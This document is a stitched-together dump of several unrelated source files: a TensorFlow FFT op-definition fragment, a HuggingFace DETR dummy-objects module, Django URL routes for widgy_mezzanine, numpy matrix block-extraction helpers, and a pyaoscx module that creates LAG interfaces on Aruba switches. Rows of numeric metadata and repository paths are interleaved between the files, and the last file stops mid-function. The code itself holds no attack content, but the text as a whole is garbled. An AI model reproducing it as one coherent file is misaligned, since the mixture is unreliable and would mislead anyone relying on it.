# type: DT_COMPLEX64
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_FLOAT
# }
# }
# op {
# name: "IRFFT3D"
# input_arg {
# name: "input"
# type: DT_COMPLEX64
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_FLOAT
# }
# }
# op {
# name: "RFFT"
# input_arg {
# name: "input"
# type: DT_FLOAT
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "RFFT2D"
# input_arg {
# name: "input"
# type: DT_FLOAT
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# op {
# name: "RFFT3D"
# input_arg {
# name: "input"
# type: DT_FLOAT
# }
# input_arg {
# name: "fft_length"
# type: DT_INT32
# }
# output_arg {
# name: "output"
# type: DT_COMPLEX64
# }
# }
# Module-level op-definition library built from the serialized OpList proto
# (human-readable form in the comment block above).  Used by every wrapper
# in this file via _apply_op_helper.
_op_def_lib = _InitOpDefLibrary(b"\n.\n\010BatchFFT\022\t\n\005input\030\010\032\n\n\006output\030\010B\013\010\017\022\007Use FFT\n2\n\nBatchFFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010B\r\010\017\022\tUse FFT2D\n2\n\nBatchFFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010B\r\010\017\022\tUse FFT3D\n0\n\tBatchIFFT\022\t\n\005input\030\010\032\n\n\006output\030\010B\014\010\017\022\010Use IFFT\n4\n\013BatchIFFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010B\016\010\017\022\nUse IFFT2D\n4\n\013BatchIFFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010B\016\010\017\022\nUse IFFT3D\n\034\n\003FFT\022\t\n\005input\030\010\032\n\n\006output\030\010\n\036\n\005FFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010\n\036\n\005FFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010\n\035\n\004IFFT\022\t\n\005input\030\010\032\n\n\006output\030\010\n\037\n\006IFFT2D\022\t\n\005input\030\010\032\n\n\006output\030\010\n\037\n\006IFFT3D\022\t\n\005input\030\010\032\n\n\006output\030\010\n.\n\005IRFFT\022\t\n\005input\030\010\022\016\n\nfft_length\030\003\032\n\n\006output\030\001\n0\n\007IRFFT2D\022\t\n\005input\030\010\022\016\n\nfft_length\030\003\032\n\n\006output\030\001\n0\n\007IRFFT3D\022\t\n\005input\030\010\022\016\n\nfft_length\030\003\032\n\n\006output\030\001\n-\n\004RFFT\022\t\n\005input\030\001\022\016\n\nfft_length\030\003\032\n\n\006output\030\010\n/\n\006RFFT2D\022\t\n\005input\030\001\022\016\n\nfft_length\030\003\032\n\n\006output\030\010\n/\n\006RFFT3D\022\t\n\005input\030\001\022\016\n\nfft_length\030\003\032\n\n\006output\030\010")
| 30.773414
| 1,598
| 0.669808
| 4,228
| 30,558
| 4.596026
| 0.05842
| 0.038905
| 0.019452
| 0.028098
| 0.917765
| 0.895533
| 0.888431
| 0.874743
| 0.869802
| 0.861208
| 0
| 0.047315
| 0.221219
| 30,558
| 992
| 1,599
| 30.804435
| 0.769224
| 0.489692
| 0
| 0.702997
| 1
| 0.002725
| 0.131262
| 0.105771
| 0
| 0
| 0
| 0.006048
| 0
| 1
| 0.051771
| false
| 0
| 0.029973
| 0
| 0.133515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6a92c8dc275fed84de7c67abcc26cb2edfa0ed88
| 1,108
|
py
|
Python
|
src/transformers/utils/dummy_timm_and_vision_objects.py
|
HimashiRathnayake/adapter-transformers
|
d9c06ecbf4aaa33756e848b8fc5b3ec65f5ff4f4
|
[
"Apache-2.0"
] | 50,404
|
2019-09-26T09:55:55.000Z
|
2022-03-31T23:07:49.000Z
|
src/transformers/utils/dummy_timm_and_vision_objects.py
|
HimashiRathnayake/adapter-transformers
|
d9c06ecbf4aaa33756e848b8fc5b3ec65f5ff4f4
|
[
"Apache-2.0"
] | 13,179
|
2019-09-26T10:10:57.000Z
|
2022-03-31T23:17:08.000Z
|
src/transformers/utils/dummy_timm_and_vision_objects.py
|
HimashiRathnayake/adapter-transformers
|
d9c06ecbf4aaa33756e848b8fc5b3ec65f5ff4f4
|
[
"Apache-2.0"
] | 13,337
|
2019-09-26T10:49:38.000Z
|
2022-03-31T23:06:17.000Z
|
# This file is autogenerated by the command `make fix-copies`, do not edit.
from ..file_utils import requires_backends
DETR_PRETRAINED_MODEL_ARCHIVE_LIST = None
class DetrForObjectDetection:
    """Dummy placeholder for ``DetrForObjectDetection``.

    Both entry points simply delegate to ``requires_backends`` with the
    "timm" and "vision" backend names.
    """

    def __init__(self, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(self, needed)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(cls, needed)
class DetrForSegmentation:
    """Dummy placeholder for ``DetrForSegmentation``.

    Both entry points simply delegate to ``requires_backends`` with the
    "timm" and "vision" backend names.
    """

    def __init__(self, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(self, needed)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(cls, needed)
class DetrModel:
    """Dummy placeholder for ``DetrModel``.

    Both entry points simply delegate to ``requires_backends`` with the
    "timm" and "vision" backend names.
    """

    def __init__(self, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(self, needed)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(cls, needed)
class DetrPreTrainedModel:
    """Dummy placeholder for ``DetrPreTrainedModel``.

    Both entry points simply delegate to ``requires_backends`` with the
    "timm" and "vision" backend names.
    """

    def __init__(self, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(self, needed)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        needed = ["timm", "vision"]
        requires_backends(cls, needed)
| 26.380952
| 75
| 0.661552
| 121
| 1,108
| 5.77686
| 0.31405
| 0.206009
| 0.206009
| 0.297568
| 0.713877
| 0.713877
| 0.713877
| 0.713877
| 0.713877
| 0.713877
| 0
| 0
| 0.193141
| 1,108
| 41
| 76
| 27.02439
| 0.781879
| 0.065884
| 0
| 0.769231
| 1
| 0
| 0.077444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.038462
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
6aa05070c2174c24912720d0bab41ed3e6c0b6fa
| 1,047
|
py
|
Python
|
widgy/contrib/widgy_mezzanine/urls.py
|
isopets/django-widgy
|
de6920b2b25699888eee1cc9b4d28f2aa5905ce1
|
[
"Apache-2.0"
] | 168
|
2015-01-04T17:22:45.000Z
|
2022-01-28T09:53:35.000Z
|
widgy/contrib/widgy_mezzanine/urls.py
|
isopets/django-widgy
|
de6920b2b25699888eee1cc9b4d28f2aa5905ce1
|
[
"Apache-2.0"
] | 82
|
2015-01-09T18:14:32.000Z
|
2020-10-08T18:13:07.000Z
|
widgy/contrib/widgy_mezzanine/urls.py
|
isopets/django-widgy
|
de6920b2b25699888eee1cc9b4d28f2aa5905ce1
|
[
"Apache-2.0"
] | 61
|
2015-01-09T17:16:51.000Z
|
2021-07-03T08:52:27.000Z
|
from django.conf.urls import url
import widgy.contrib.widgy_mezzanine.views
# Route table for the widgy_mezzanine contrib app. Each pattern's ``name`` is
# the dotted path of its view function, so URLs are reversed by that dotted
# string — presumably so existing reverse() calls using the view path keep
# working; TODO confirm against callers.
urlpatterns = [
    # Preview a node by primary key.
    url('^preview/(?P<node_pk>[^/]+)/$',
        widgy.contrib.widgy_mezzanine.views.preview,
        name='widgy.contrib.widgy_mezzanine.views.preview'), # undelete
    # Preview a node in the context of a specific page.
    url('^preview-page/(?P<node_pk>[^/]+)/(?P<page_pk>[^/]+)/$',
        widgy.contrib.widgy_mezzanine.views.preview,
        name='widgy.contrib.widgy_mezzanine.views.preview'),
    # Submit a form widget that lives on a specific page.
    url('^form-page/(?P<form_node_pk>[^/]*)/(?P<page_pk>[^/]+)/$',
        widgy.contrib.widgy_mezzanine.views.handle_form,
        name='widgy.contrib.widgy_mezzanine.views.handle_form'),
    # deprecated urls for backwards compatibility with slug reversing
    url('^preview/(?P<node_pk>[^/]+)/(?P<slug>.+)/$',
        widgy.contrib.widgy_mezzanine.views.preview,
        name='widgy.contrib.widgy_mezzanine.views.preview'),
    url('^form/(?P<form_node_pk>[^/]*)/(?P<slug>.+)/$',
        widgy.contrib.widgy_mezzanine.views.handle_form,
        name='widgy.contrib.widgy_mezzanine.views.handle_form'),
]
| 45.521739
| 72
| 0.662846
| 130
| 1,047
| 5.153846
| 0.207692
| 0.197015
| 0.279104
| 0.426866
| 0.810448
| 0.710448
| 0.710448
| 0.710448
| 0.710448
| 0.677612
| 0
| 0
| 0.136581
| 1,047
| 22
| 73
| 47.590909
| 0.74115
| 0.068768
| 0
| 0.526316
| 0
| 0
| 0.458848
| 0.458848
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.105263
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6aa0538a45756e66965a5ed6a592860f1086a25c
| 13,137
|
py
|
Python
|
utils/base.py
|
newTypeGeek/Network-Reconstruction
|
135a07cc304dac0666a9d11d3548aee7a669eaad
|
[
"MIT"
] | 3
|
2020-10-15T09:33:59.000Z
|
2022-03-12T11:22:04.000Z
|
utils/base.py
|
newTypeGeek/Network-Reconstruction
|
135a07cc304dac0666a9d11d3548aee7a669eaad
|
[
"MIT"
] | null | null | null |
utils/base.py
|
newTypeGeek/Network-Reconstruction
|
135a07cc304dac0666a9d11d3548aee7a669eaad
|
[
"MIT"
] | 1
|
2020-10-15T09:38:20.000Z
|
2020-10-15T09:38:20.000Z
|
#!/usr/bin/env python3
import numpy as np
def eigen_values(M):
    """Return the eigenvalues of a general square matrix.

    Arguments:
    1. M: A general square matrix (2D numpy.ndarray of int or float)
    Returns:
    1. spectrum: Eigenvalues of M as computed by np.linalg.eig
    """
    assert type(M) == np.ndarray, "M must be of type 'numpy.ndarray'"
    assert M.size > 0, "M must not be empty"
    assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
    assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
    shape = M.shape
    assert len(shape) == 2, "M must be 2D shape"
    assert shape[0] == shape[1], "M must be a square matrix"
    # Eigenvectors are discarded; only the spectrum is returned.
    spectrum, _vecs = np.linalg.eig(M)
    return spectrum
def inverse(M, tol=1e5):
    """Return the inverse of a square matrix, or None when ill-conditioned.

    Arguments:
    1. M: A general square matrix
    2. tol: Tolerance on the condition number (default: 1e5)
    Returns:
    1. M_inv: Inverse of M, or None when cond(M) >= tol
    """
    assert type(M) == np.ndarray, "M must be of type 'numpy.ndarray'"
    assert M.size > 0, "M must not be empty"
    assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
    assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
    shape = M.shape
    assert len(shape) == 2, "M must be 2D shape"
    assert shape[0] == shape[1], "M must be a square matrix"
    assert (type(tol) == int or type(tol) == float) and np.isfinite(tol) and tol >= 0, "tol must be a non-negative number"
    # A condition number at or above tol is treated as numerically singular.
    if np.linalg.cond(M) < tol:
        return np.linalg.inv(M)
    print("M is highly singular")
    return None
def off_diag_upper(M):
    """Return the strictly-upper-triangular entries of a square matrix.

    Arguments:
    1. M: input matrix
    Returns:
    1. off_upper: the off-diagonal (upper triangle) elements of M,
       flattened row by row
    """
    assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
    assert M.size > 0, "M must not be empty"
    assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
    assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
    shape = M.shape
    assert len(shape) == 2, "M must be 2D shape"
    assert shape[0] == shape[1], "M must be a square matrix"
    # Boolean mask that is True strictly above the main diagonal.
    mask = np.triu(np.ones(shape), 1) == 1
    return M[mask]
def index_recover(n):
    """Map flat upper-triangle positions back to (row, col) indices.

    Inverts the flattening performed by off_diag_upper's triu-based
    extraction for an n-by-n matrix.
    Arguments:
    1. n: The original matrix size
    Returns:
    1. row: Row indices
    2. col: Column indices
    """
    assert type(n) == int and n > 0, "n must be a positive integer"
    length = int(n * (n - 1) / 2)
    row = np.zeros((length,))
    col = np.zeros((length,))
    # Walk the rows; row i contributes columns i+1 .. n-1 in order.
    start = 0
    for i in range(n - 1):
        width = n - 1 - i
        end = start + width
        row[start:end] = i
        col[start:end] = np.arange(i + 1, n)
        start = end
    return row, col
def block_diag_up(M, measure_id):
    """Extract the block of M restricted to the measured-node rows/columns.

    Arguments:
    1. M: The original square matrix M
    2. measure_id: Measured node indices of the original matrix M
    Returns:
    1. B: Block matrix whose entries are copied from M at the
       measured-node row/column positions
    """
    assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
    assert M.size > 0, "M must not be empty"
    assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
    assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
    shape = M.shape
    assert len(shape) == 2, "M must be 2D shape"
    assert shape[0] == shape[1], "M must be a square matrix"
    assert type(measure_id) == np.ndarray, "measure_id must be of type 'np.ndarray'"
    assert measure_id.size > 0, "measure_id must not be empty"
    assert measure_id.dtype == int, "measure_id must be of dtype 'int'"
    assert len(measure_id.shape) == 1, "measure_id must be 1D shape"
    assert (measure_id >= 0).all(), "measure_id elements must be non-negative integers"
    assert np.max(measure_id) < shape[0], "measure_id elements must be smaller than the input matrix size"
    n = len(measure_id)
    B = np.zeros((n, n))
    if np.allclose(M, M.T):
        # Symmetric input: copy the upper triangle once and mirror it.
        for r in range(n):
            B[r, r] = M[measure_id[r], measure_id[r]]
            for c in range(r + 1, n):
                B[r, c] = M[measure_id[r], measure_id[c]]
                B[c, r] = B[r, c]
    else:
        # General case: copy every entry individually.
        for r in range(n):
            for c in range(n):
                B[r, c] = M[measure_id[r], measure_id[c]]
    return B
def block_diag_low(M, hidden_id):
    """Extract the block of M restricted to the hidden-node rows/columns.

    Arguments:
    1. M: The original square matrix M
    2. hidden_id: Hidden node indices of the original matrix M
    Returns:
    1. B: Block matrix whose entries are copied from M at the
       hidden-node row/column positions
    """
    assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
    assert M.size > 0, "M must not be empty"
    assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
    assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
    shape = M.shape
    assert len(shape) == 2, "M must be 2D shape"
    assert shape[0] == shape[1], "M must be a square matrix"
    assert type(hidden_id) == np.ndarray, "hidden_id must be of type 'np.ndarray'"
    assert hidden_id.size > 0, "hidden_id must not be empty"
    assert hidden_id.dtype == int, "hidden_id must be of dtype 'int'"
    assert len(hidden_id.shape) == 1, "hidden_id must be 1D shape"
    assert (hidden_id >= 0).all(), "hidden_id elements must be non-negative integers"
    assert np.max(hidden_id) < shape[0], "hidden_id elements must be smaller than the input matrix size"
    n = len(hidden_id)
    B = np.zeros((n, n))
    if np.allclose(M, M.T):
        # Symmetric input: copy the upper triangle once and mirror it.
        for r in range(n):
            B[r, r] = M[hidden_id[r], hidden_id[r]]
            for c in range(r + 1, n):
                B[r, c] = M[hidden_id[r], hidden_id[c]]
                B[c, r] = B[r, c]
    else:
        # General case: copy every entry individually.
        for r in range(n):
            for c in range(n):
                B[r, c] = M[hidden_id[r], hidden_id[c]]
    return B
def block_off_up(M, measure_id, hidden_id):
    '''
    Extract the block matrix from matrix M with row corresponds to measured nodes
    and column corresponds to hidden nodes
    Arguments:
    1. M: The original square matrix M
    2. measure_id: Measured node indices of the original matrix M
    3. hidden_id: Hidden node indices of the original matrix M
    Returns:
    1. B: Block matrix with elements equal to the original matrix
    formed with row corresponds to measured nodes and column
    corresponds to hidden nodes
    '''
    assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
    assert M.size > 0, "M must not be empty"
    assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
    assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
    size = M.shape
    assert len(size) == 2, "M must be 2D shape"
    assert size[0] == size[1], "M must be a square matrix"
    assert type(measure_id) == np.ndarray, "measure_id must be of type 'np.ndarray'"
    assert measure_id.size > 0, "measure_id must not be empty"
    assert measure_id.dtype == int, "measure_id must be of dtype 'int'"
    assert len(measure_id.shape) == 1, "measure_id must be 1D shape"
    assert (measure_id >= 0).all(), "measure_id elements must be non-negative integers"
    assert np.max(measure_id) < size[0], "measure_id elements must be smaller than the input matrix size"
    assert type(hidden_id) == np.ndarray, "hidden_id must be of type 'np.ndarray'"
    assert hidden_id.size > 0, "hidden_id must not be empty"
    assert hidden_id.dtype == int, "hidden_id must be of dtype 'int'"
    assert len(hidden_id.shape) == 1, "hidden_id must be 1D shape"
    assert (hidden_id >= 0).all(), "hidden_id elements must be non-negative integers"
    assert np.max(hidden_id) < size[0], "hidden_id elements must be smaller than the input matrix size"
    n_m = len(measure_id)
    n_h = len(hidden_id)
    # measure_id and hidden_id must together partition the node indices.
    assert size[0] == (n_m + n_h), "Total number of elements in measure_id and hidden_id does not equal the number of rows of M"
    all_id = np.unique(np.concatenate((measure_id, hidden_id)))
    # Fixed typo in the message below ("mesure_id" -> "measure_id").
    assert len(all_id) == size[0], "measure_id and hidden_id contain common elements"
    # Copy M entries with measured-node rows and hidden-node columns.
    B = np.zeros((n_m, n_h))
    for i in range(n_m):
        for j in range(n_h):
            B[i, j] = M[measure_id[i], hidden_id[j]]
    return B
def block_off_low(M, measure_id, hidden_id):
    '''
    Extract the block matrix from matrix M with row corresponds to hidden nodes
    and column corresponds to measured nodes
    Arguments:
    1. M: The original square matrix M
    2. measure_id: Measured node indices of the original matrix M
    3. hidden_id: Hidden node indices of the original matrix M
    Returns:
    1. B: Block matrix with elements equal to the original matrix
    formed with row corresponds to hidden nodes and column
    corresponds to measured nodes
    '''
    assert type(M) == np.ndarray, "M must be of type 'np.ndarray'"
    assert M.size > 0, "M must not be empty"
    assert M.dtype == int or M.dtype == float, "M must be of dtype 'int' or 'float'"
    assert np.isfinite(M).all(), "Elements of M must be finite real numbers"
    size = M.shape
    assert len(size) == 2, "M must be 2D shape"
    assert size[0] == size[1], "M must be a square matrix"
    assert type(measure_id) == np.ndarray, "measure_id must be of type 'np.ndarray'"
    assert measure_id.size > 0, "measure_id must not be empty"
    assert measure_id.dtype == int, "measure_id must be of dtype 'int'"
    assert len(measure_id.shape) == 1, "measure_id must be 1D shape"
    assert (measure_id >= 0).all(), "measure_id elements must be non-negative integers"
    assert np.max(measure_id) < size[0], "measure_id elements must be smaller than the input matrix size"
    assert type(hidden_id) == np.ndarray, "hidden_id must be of type 'np.ndarray'"
    assert hidden_id.size > 0, "hidden_id must not be empty"
    assert hidden_id.dtype == int, "hidden_id must be of dtype 'int'"
    assert len(hidden_id.shape) == 1, "hidden_id must be 1D shape"
    assert (hidden_id >= 0).all(), "hidden_id elements must be non-negative integers"
    assert np.max(hidden_id) < size[0], "hidden_id elements must be smaller than the input matrix size"
    n_m = len(measure_id)
    n_h = len(hidden_id)
    # measure_id and hidden_id must together partition the node indices.
    assert size[0] == (n_m + n_h), "Total number of elements in measure_id and hidden_id does not equal the number of rows of M"
    all_id = np.unique(np.concatenate((measure_id, hidden_id)))
    # Fixed typo in the message below ("mesure_id" -> "measure_id").
    assert len(all_id) == size[0], "measure_id and hidden_id contain common elements"
    # Copy M entries with hidden-node rows and measured-node columns.
    B = np.zeros((n_h, n_m))
    for i in range(n_h):
        for j in range(n_m):
            B[i, j] = M[hidden_id[i], measure_id[j]]
    return B
def matrix_rearrange(M, measure_id, hidden_id):
    """Permute a square matrix so measured nodes come first, hidden last.

    Arguments:
    1. M: The original square matrix M
    2. measure_id: Measured node indices of the original matrix M
    3. hidden_id: Hidden node indices of the original matrix M
    Returns:
    1. M_perm: The permutated matrix, laid out as
               | M_m  M_u |
               | M_l  M_h |
    2. M_m: block among the measured nodes
    3. M_u: block with measured-node rows, hidden-node columns
    4. M_l: block with hidden-node rows, measured-node columns
    5. M_h: block among the hidden nodes
    """
    # NOTE: the block_* helpers below all validate their inputs, so the
    # assertions are deliberately not repeated here.
    M_m = block_diag_up(M, measure_id)
    M_h = block_diag_low(M, hidden_id)
    M_u = block_off_up(M, measure_id, hidden_id)
    # For a symmetric M the lower off-diagonal block is just the transpose
    # of the upper one, which saves recomputing it element by element.
    if np.allclose(M, M.T):
        M_l = M_u.T
    else:
        M_l = block_off_low(M, measure_id, hidden_id)
    # Stitch the four blocks back together into the permuted matrix.
    M_perm = np.block([[M_m, M_u], [M_l, M_h]])
    return M_perm, M_m, M_u, M_l, M_h
| 35.991781
| 128
| 0.6248
| 2,153
| 13,137
| 3.71203
| 0.080353
| 0.0503
| 0.030656
| 0.015766
| 0.839965
| 0.830205
| 0.806557
| 0.803929
| 0.789039
| 0.789039
| 0
| 0.012678
| 0.273502
| 13,137
| 364
| 129
| 36.090659
| 0.824707
| 0.273502
| 0
| 0.694915
| 0
| 0
| 0.323072
| 0
| 0
| 0
| 0
| 0
| 0.474576
| 1
| 0.050847
| false
| 0
| 0.00565
| 0
| 0.107345
| 0.00565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aa08e65b26862080cd763c69346c708f2d566b6
| 23,306
|
py
|
Python
|
pyaoscx/lag.py
|
blag/pyaoscx
|
8af1b5c5c6fb71de0c2eed67c6930465b73872d8
|
[
"Apache-2.0"
] | null | null | null |
pyaoscx/lag.py
|
blag/pyaoscx
|
8af1b5c5c6fb71de0c2eed67c6930465b73872d8
|
[
"Apache-2.0"
] | null | null | null |
pyaoscx/lag.py
|
blag/pyaoscx
|
8af1b5c5c6fb71de0c2eed67c6930465b73872d8
|
[
"Apache-2.0"
] | null | null | null |
# (C) Copyright 2019-2020 Hewlett Packard Enterprise Development LP.
# Apache License 2.0
from pyaoscx import common_ops
from pyaoscx import port
from pyaoscx import interface
import json
import re
import logging
def create_l2_lag_interface(name, phys_ports, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
                            vlan_ids_list=None, desc=None, admin_state="up", **kwargs):
    """
    Perform a POST call to create a Port table entry for L2 LAG interface.
    :param name: Alphanumeric name of LAG Port
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
    :param vlan_ids_list: Optional list of integer VLAN IDs to add as trunk VLANS. Defaults to empty list if not specified.
    :param desc: Optional description for the interface. Defaults to nothing if not specified.
    :param admin_state: Optional administratively-configured state of the port.
        Defaults to "up" if not specified
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    # None (not a mutable []) as the default avoids sharing one list object
    # across calls; normalize it here before delegating.
    if vlan_ids_list is None:
        vlan_ids_list = []
    if kwargs["url"].endswith("/v1/"):
        return _create_l2_lag_interface_v1(name, phys_ports, lacp_mode, mc_lag, fallback_enabled, vlan_ids_list, desc,
                                           admin_state, **kwargs)
    else:  # Updated else for when version is v10.04
        success = _create_l2_lag_interface(name, phys_ports, lacp_mode, mc_lag, fallback_enabled, vlan_ids_list, desc,
                                           admin_state, **kwargs)
        if mc_lag or fallback_enabled:
            # v10.04 needs a follow-up PUT to set the MC-LAG / LACP-fallback flags.
            return success and _update_l2_lag_interface(name, mc_lag, fallback_enabled, **kwargs)
        else:
            return success
def _create_l2_lag_interface_v1(name, phys_ports, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
                                vlan_ids_list=None, desc=None, admin_state="up", **kwargs):
    """
    Perform a POST call to create a Port table entry for L2 LAG interface.
    :param name: Alphanumeric name of LAG Port
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
    :param vlan_ids_list: Optional list of integer VLAN IDs to add as trunk VLANS. Defaults to empty list if not specified.
    :param desc: Optional description for the interface. Defaults to nothing if not specified.
    :param admin_state: Optional administratively-configured state of the port.
        Defaults to "up" if not specified
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    # None (not a mutable []) as the default avoids sharing one list object
    # across calls.
    if vlan_ids_list is None:
        vlan_ids_list = []
    ports_list = port.get_all_ports(**kwargs)
    port_name_percents = common_ops._replace_special_characters(name)
    if "/rest/v1/system/ports/%s" % port_name_percents not in ports_list:
        # Extract LAG ID from LAG name (raw string avoids the invalid
        # escape-sequence warning for \d).
        lag_id = int(re.search(r'\d+', name).group())
        # For each port, add LAG ID to the Interface table entry, and delete the Port table entry
        for phys_port in phys_ports:
            interface.add_port_to_lag(phys_port, lag_id, **kwargs)
        interfaces = ["/rest/v1/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
                      for phys_port in phys_ports]
        port_data = {"admin": admin_state,
                     "interfaces": interfaces,
                     "name": name,
                     "routing": False,
                     "vlan_trunks": ["/rest/v1/system/vlans/%d" % vlan_id for vlan_id in vlan_ids_list],
                     "lacp": lacp_mode,
                     "other_config": {
                         "mclag_enabled": mc_lag,
                         "lacp-fallback": fallback_enabled
                     },
                     "vlan_mode": "native-untagged",
                     "vlan_tag": "/rest/v1/system/vlans/1"
                     }
        if desc is not None:
            port_data['description'] = desc
        target_url = kwargs["url"] + "system/ports"
        post_data = json.dumps(port_data, sort_keys=True, indent=4)
        response = kwargs["s"].post(target_url, data=post_data, verify=False)
        if not common_ops._response_ok(response, "POST"):
            logging.warning("FAIL: Adding Port table entry '%s' failed with status code %d: %s"
                            % (name, response.status_code, response.text))
            return False
        else:
            logging.info("SUCCESS: Adding Port table entry '%s' succeeded" % name)
            return True
    else:
        logging.info("SUCCESS: No need to add Port table entry '%s' because it already exists"
                     % name)
        return True
def _create_l2_lag_interface(name, phys_ports, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
                             vlan_ids_list=None, desc=None, admin_state="up", **kwargs):
    """
    Perform a POST call to create a Port table entry for L2 LAG interface.
    :param name: Alphanumeric name of LAG Port
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
    :param vlan_ids_list: Optional list of integer VLAN IDs to add as trunk VLANS. Defaults to empty list if not specified.
    :param desc: Optional description for the interface. Defaults to nothing if not specified.
    :param admin_state: Optional administratively-configured state of the port.
        Defaults to "up" if not specified
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    # None (not a mutable []) as the default avoids sharing one list object
    # across calls.
    if vlan_ids_list is None:
        vlan_ids_list = []
    ints_dict = interface.get_all_interfaces(**kwargs)
    if name not in ints_dict:
        # Extract LAG ID from LAG name (raw string avoids the invalid
        # escape-sequence warning for \d).
        lag_id = int(re.search(r'\d+', name).group())
        # For each port, add LAG ID to the Interface table entry
        for phys_port in phys_ports:
            interface.add_port_to_lag(phys_port, lag_id, **kwargs)
        interfaces = ["/rest/v10.04/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
                      for phys_port in phys_ports]
        int_data = {"admin": admin_state,
                    "interfaces": interfaces,
                    "name": name,
                    "type": "lag",
                    "routing": False,
                    "vlan_trunks": ["/rest/v10.04/system/vlans/%d" % vlan_id for vlan_id in vlan_ids_list],
                    "lacp": lacp_mode,
                    "other_config": {},
                    "vlan_mode": "native-untagged",
                    "vlan_tag": "/rest/v10.04/system/vlans/1"
                    }
        if desc is not None:
            int_data['description'] = desc
        target_url = kwargs["url"] + "system/interfaces"
        post_data = json.dumps(int_data, sort_keys=True, indent=4)
        response = kwargs["s"].post(target_url, data=post_data, verify=False)
